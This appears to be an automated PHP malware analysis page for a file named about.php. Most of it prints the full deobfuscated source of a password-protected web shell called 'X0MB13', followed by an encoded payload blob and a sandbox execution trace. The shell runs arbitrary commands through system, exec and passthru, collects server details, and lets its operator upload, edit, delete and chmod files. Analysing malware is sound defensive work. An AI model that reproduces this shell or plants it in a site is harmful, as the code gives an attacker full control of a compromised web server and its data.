PHP Malware Analysis

about.php

md5: f899d6cbe1be6395a0fa2a802b8eb579

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title

URLs


Deobfuscated PHP code

<br />
<b>Warning</b>:  ob_start(): output handler 'ob_gzhandler' conflicts with 'zlib output compression' in <b>/home/aravalcl/public_html/wp/wp-content/plugins/seo/alfa-index.php(3) : eval()'d code(1) : eval()'d code</b> on line <b>3245</b><br />
<?php 
/**
Design by TubagusNM
Default pass cgi: xaisyndicate
Thx to con7ext_shell, b374k shell, and all members garuda tersakti 72
**/
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$sym = "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";
eval /* PHPDeobfuscator eval output */ {
    error_reporting(0);
    $xyn = 'tunafeesh';
    if (isset($_POST['pass'])) {
        if ($_POST['pass'] == $password) {
            setcookie($xyn, $_POST['pass'], time() + 3600);
        }
        let_him_in();
    }
    if (!empty($password) && !isset($_COOKIE[$xyn]) or $_COOKIE[$xyn] != $password) {
        initiate();
        die;
    }
    $me = basename("/var/www/html/about.php.490bac53c303b9a6021e0e10e0e70fe7.bin");
    $server_soft = $_SERVER["SERVER_SOFTWARE"];
    $uname = php_uname();
    $cur_user = get_current_user() . ' uid:' . getmyuid() . ' gid:' . getmygid();
    $safe_mode = ini_get('safe_mode');
    $safe_mode = $safe_mode ? '<font color:crimson>ON</font>' : '<font color=#ccff00>OFF</font>';
    $cwd = getcwd();
    $bckC = '#333333';
    $txtC = '#999999';
    $start = '<html><head><title>' . getenv('HTTP_HOST') . ' => X0MB13</title><style>body {background:' . $bckC . ';color:' . $txtC . ';font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:' . $txtC . ';text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:' . $txtC . ';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:' . $bckC . ';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:' . $bckC . ';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:' . $bckC . ';border-radius:10px;border:1px solid ' . $txtC . ';color:' . $txtC . ';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:' . $txtC . ';box-shadow:0px 0px 1px ' . $txtC . ';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid ' . $txtC . ';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:' . $bckC . ';color:' . $txtC . ';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x">X0MB13</a></h1>';
    $menu = '<center><p id="menu"><span id="menuB"><<a href="' . $me . '">Home</a>> <<a href="?x=cmd&d="' . realpath('.') . '">Command</a>> <<a href="?x=php&d="' . realpath('.') . '">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';
    $end = '</body></html>';
    $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> ' . $server_soft . '  |||  <b><i><u>Uname:</u></i></b> ' . $uname . ' |||</br>||| <b><i><u>User:</u></i></b> ' . $cur_user . ' ||| <b><i><u>Safe Mode:</u></i></b> ' . $safe_mode . ' ||| <b><i><u>Directory: </i></b></u>' . $cwd . ' |||</p></center><hr>';
    print $start;
    print $menu;
    print $inf;
    $moreI = array('PHP Version' => phpversion(), 'Zend Version' => zend_version(), 'Magic Quotes' => magic_quotes(), 'Curl' => curl(), 'Register Globals' => reg_globals(), 'OpenBase Dir' => openbase_dir(), 'MySQL' => myql(), 'Gzip' => gzip(), 'MsSQL' => mssql(), 'PostgreSQL' => postgresql(), 'Oracle' => oracle(), 'Total Space' => h_size(disk_total_space('/')), 'Used Space' => h_size(disk_free_space('/')), 'Your IP' => $_SERVER['REMOTE_ADDR'], 'Server IP' => $_SERVER['SERVER_ADDR']);
    print "<table id=\"moreI\">";
    foreach ($moreI as $n => $v) {
        print '<td>' . $n . '</td><td> :> </td><td> ' . $v . '</td><tr>';
    }
    print "<td colspan=3 align=\"center\"><a href=\"?x=phpinf\" target=\"_blank\">PHPInfo</a></td></table>";
    if (isset($_GET['d'])) {
        chdir($_GET['d']);
    }
    if (isset($_REQUEST['x'])) {
        print '<p id="bck"><a href="?d=' . realpath('.') . '">BACK</a></p>';
        switch ($_REQUEST['x']) {
            case 'c':
                if (isset($_POST['edit_form'])) {
                    $f = $_GET['f'];
                    $e = fopen($f, 'w') or print "<p id=\"nn\">Error Opening File</p>";
                    fwrite($e, $_POST['edit_form']) or print "<p id=\"nn\">Couldn't Save File</p>";
                    fclose($e);
                }
                print '<center><p>Editing ' . $_GET['f'] . ' (' . perms($_GET['d'] . $_GET['f']) . ') .</p></br></br><form action="?x=c&d=' . realpath('.') . '&f=' . $_GET['f'] . '" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';
                if (file_exists($_GET['f'])) {
                    $c = file($_GET['f']);
                    foreach ($c as $l) {
                        print htmlspecialchars($l);
                    }
                }
                print "</textarea></br></br><input type=\"submit\" value=\"Save\" id=\"sv\"></form></center>";
                break;
            case 'cmd':
                print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=' . realpath('.') . '" method="POST"><input type="text" value="" name="cmd" id="lt">  <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
                if (isset($_POST['cmd'])) {
                    $cmd = $_POST['cmd'];
                    execute(exec_meth(), $cmd);
                }
                print "</textarea></center>";
                break;
            case 'php':
                print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="' . realpath('.') . '" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
                print "</textarea></center>";
                break;
            case 'phpinf':
                phpinfo();
                break;
            case 'q':
                setcookie($xyn, '', time() - 3600);
                let_him_in();
                break;
            case 'x':
                print "</br></br></br><center><h1 id=\"nm\">H1 7H15 15 X0MB13</h1><h3>Mail: <a href=\"mailto:X0MB13@REBORN>COM\">[email protected]</a></h3><h3>Twitter: <a href=\"http://www.twitter.com/X0MB13_\" target=\"_blank\">X0MB13</a></h3><h3>Facebook: <a href=\"http://www.fb.com/xombie.xombie.7\" target=\"_blank\">X0MB13</a></h3></center>";
                break;
        }
    } else {
        if (isset($_GET['d'])) {
            chdir($_GET['d']);
        }
        if (isset($_GET['ndir'])) {
            $d = $_GET['d'];
            $n = $_GET['ndir'];
            mkdir($d . DIRECTORY_SEPARATOR . $n);
        }
        if (isset($_POST['new'])) {
            $n = $_POST['new'];
            $o = $_POST['old'];
            $d = $_POST['d'];
            rename($d . DIRECTORY_SEPARATOR . $o, $d . DIRECTORY_SEPARATOR . $n);
        }
        if (isset($_GET['deld'])) {
            $d = $_GET['deld'];
            rmdir($d);
        }
        if (isset($_GET['delf'])) {
            $d = $_GET['delf'];
            unlink($d);
        }
        if (isset($_GET['ch'])) {
            $ch = $_GET['ch'];
            $d = $_GET['df'];
            chmod($d, $ch);
        }
        if (isset($_FILES['upfile']['name'])) {
            $d = realpath('.') . DIRECTORY_SEPARATOR . basename($_FILES['upfile']['name']);
            move_uploaded_file($_FILES['upfile']['tmp_name'], $d);
        }
        print '<p align="center" id="cp">' . curpath('') . '</p>';
        print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=' . realpath('.') . '" method="GET">Create Dir: <input type="hidden" name="d" value="' . realpath('.') . '" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="' . realpath('.') . '" method="GET">Create File: <input type="hidden" value="' . realpath('.') . '" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=' . realpath('.') . '" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=' . realpath('.') . '" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
        print "</br>";
        $filex = array();
        $dirx = array();
        print "<table width=\"75%\" align=\"center\" id=\"ft\" ><td id=\"fh\"><b>Name</b></td><td id=\"fh\" align=\"center\"><b>Permissions</b></td><td id=\"fh\" align=\"center\"><b>Owner</b></td><td id=\"fh\" align=\"center\"><b>Options</b></td><tr id=\"fn\">";
        if ($handle = opendir('.')) {
            while (false !== ($file = readdir($handle))) {
                if (is_dir($file)) {
                    $dirx[] .= $file;
                } else {
                    $filex[] .= $file;
                }
            }
            asort($filex);
            asort($dirx);
            $i = 0;
            foreach ($dirx as $file) {
                if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
                    $own = posix_getpwuid(fileowner($file));
                    $grp = posix_getgrgid(filegroup($file));
                } else {
                    $own['name'] = '???';
                    $grp['name'] = '???';
                }
                print '<td id="fc"><span id="n' . $file . '"><a href="?d=' . realpath($file) . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" value="' . $file . '" id="lt" name="new"><input type="hidden" value="' . $file . '" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td>';
                if ($i == 0 or $i == 1) {
                    print "<td id=\"fc\"></td><tr id=\"fn\">";
                } else {
                    print '<td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\')">[D]</a></td><tr id="fn">';
                }
                $i++;
            }
            foreach ($filex as $file) {
                if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
                    $own = posix_getpwuid(fileowner($file));
                    $grp = posix_getgrgid(filegroup($file));
                } else {
                    $own['name'] = '???';
                    $grp['name'] = '???';
                }
                print '<td id="fc"><span id="n' . $file . '"><a href="?x=c&d=' . realpath('.') . '&f=' . $file . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" id="lt" value="' . $file . '" name="new"><input type="hidden" value="' . $file . '" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td><td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\');">[D]</a></td><tr id="fn">';
            }
        }
        print "</table></br></br></br>";
    }
    function openbase_dir()
    {
        $x = ini_get('open_basedir');
        if (!$x) {
            $o = '<font color=#ccff00>OFF</font>';
        } else {
            $o = '<font color=crimson>ON</font>';
        }
        return $o;
    }
    function magic_quotes()
    {
        $x = get_magic_quotes_gpc();
        if (empty($x)) {
            $m = '<font color=#ccff00>OFF</font>';
        } else {
            $m = '<font color=crimson>ON</font>';
        }
        return $m;
    }
    function curl()
    {
        if (extension_loaded('curl')) {
            $c = '<font color=crimson>ON</font>';
        } else {
            $c = '<font color=#ccff00>OFF</font>';
        }
        return $c;
    }
    function reg_globals()
    {
        if (ini_get('reqister_globals')) {
            $r = '<font color=crimson>ON</font>';
        } else {
            $r = '<font color=#ccff00>OFF</font>';
        }
        return $r;
    }
    function oracle()
    {
        if (function_exists('ocilogon')) {
            $o = '<font color=crimson>ON</font>';
        } else {
            $o = '<font color=#ccff00>OFF</font>';
        }
        return $o;
    }
    function postgresql()
    {
        if (function_exists('pg_connect')) {
            $p = '<font color=crimson>ON</font>';
        } else {
            $p = '<font color=#ccff00>OFF</font>';
        }
        return $p;
    }
    function myql()
    {
        if (function_exists('mysql_connect')) {
            $m = '<font color=crimson>ON</font>';
        } else {
            $m = '<font color=#ccff00>OFF</font>';
        }
        return $m;
    }
    function mssql()
    {
        if (function_exists('mssql_connect')) {
            $m = '<font color=crimson>ON</font>';
        } else {
            $m = '<font color=#ccff00>OFF</font>';
        }
        return $m;
    }
    function gzip()
    {
        if (function_exists('gzencode')) {
            $m = '<font color=crimson>ON</font>';
        } else {
            $m = '<font color=#ccff00>OFF</font>';
        }
        return $m;
    }
    function h_size($s)
    {
        if ($s >= 1073741824) {
            $s = round($s / 1073741824 * 100) / 100 . 'GB';
        } elseif ($s >= 1048576) {
            $s = round($s / 1048576 * 100) / 100 . 'MB';
        } elseif ($s >= 1024) {
            $s = round($s / 1024 * 100) / 100 . 'KB';
        } else {
            $s .= 'B';
        }
        return $s;
    }
    function curpath($d)
    {
        if ($d == '') {
            $d = getcwd();
        }
        $p = '';
        $n = '';
        $dx = explode(DIRECTORY_SEPARATOR, $d);
        for ($i = 0; $i < count($dx); $i++) {
            $g = $dx[$i];
            $p .= $dx[$i] . DIRECTORY_SEPARATOR;
            $n .= '<a href="?d=' . $p . '">' . $g . '</a>' . DIRECTORY_SEPARATOR;
        }
        return $n;
    }
    function get_color($f)
    {
        if (is_writable($f)) {
            $c = '#ccff00';
        }
        if (!is_writable($f) && is_readable($f)) {
            $c = '' . $txtC . '';
        }
        if (!is_writable($f) && !is_readable($f)) {
            $c = 'crimson';
        }
        return $c;
    }
    function perms($f)
    {
        if (file_exists($f)) {
            return substr(sprintf('%o', fileperms($f)), -4);
        } else {
            return "???";
        }
    }
    function exec_meth()
    {
        if (function_exists('passthru')) {
            $m = 'passthru';
        }
        if (function_exists('exec')) {
            $m = 'exec';
        }
        if (function_exists('shell_exec')) {
            $m = 'shell_exec';
        }
        if (function_exists('system')) {
            $m = 'system';
        }
        if (!isset($m)) {
            $m = 'Disabled';
        }
        return $m;
    }
    function execute($m, $c)
    {
        if ($m == 'passthru') {
            passthru($c);
        } elseif ($m == 'system') {
            system($c);
        } elseif ($m == 'shell_exec') {
            print shell_exec($c);
        } elseif ($m == 'exec') {
            exec($c, $r);
            foreach ($r as $o) {
                print $o . '</br>';
            }
        } else {
            print "dafuq?";
        }
    }
    function initiate()
    {
        print '<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="' . basename("/var/www/html/about.php.490bac53c303b9a6021e0e10e0e70fe7.bin") . '" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>';
    }
    function let_him_in()
    {
        header("Location: " . basename("/var/www/html/about.php.490bac53c303b9a6021e0e10e0e70fe7.bin"));
    }
    print $end;
};

Execution traces

data/traces/f899d6cbe1be6395a0fa2a802b8eb579_trace-1676259731.713.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:42:37.610780]
1	0	1	0.000138	393512
1	3	0	0.000225	403592	{main}	1		/var/www/html/uploads/about.php	0	0
2	4	0	0.000244	403592	ini_set	0		/var/www/html/uploads/about.php	12	2	'output_buffering'	0
2	4	1	0.000261	403664
2	4	R			FALSE
2	5	0	0.000276	403592	ini_set	0		/var/www/html/uploads/about.php	13	2	'display_errors'	0
2	5	1	0.000290	403664
2	5	R			''
1		A						/var/www/html/uploads/about.php	15	$sym = '7Rv9aptT8uf2vf4PG0wN0lLRVJw2SiHI1a7t3l0bO8rHeJ3k8UuygCUVwSI4g6v//XNpAQFPtpy73nSTOHNqdHN0dHN0c4eFM1OZwbhSmRObq86wq37xbHu+MDXFZFov5NyOFOiKw0F529zptI3jo9Ozaorl2bbyodslNzBH7dS0Nj7MKAtgGJB8V69w3k6yPUWF7REnQWyn++jw6yHMvSYJaowoQY3Y7EBGWfyAp5az6JSIPnxVHuTsXBwd/fRp+g6Jf+gSylWt706JG+TWjJ3YZmBXlQQxl5O0Rq4tPZubHvBvGK/e/jw1jK7atjm74sywduh1euNnbfLn6cm7lvx6nB69OvvLi5N264PaaRFGsyLLEEJAte27zGOBgLaCFU6DZNMRHZ1hXyFhHIyVPgylC2sUXata1wq7YG2Qv5HSgHjAtQEjHaXoRSrjnc1m92xUmYTUZ4hCE8rGPotGm5r60beTAWnrV2pcgdAOfD8Mh1D96NWrAgT4nwXIOvxP'
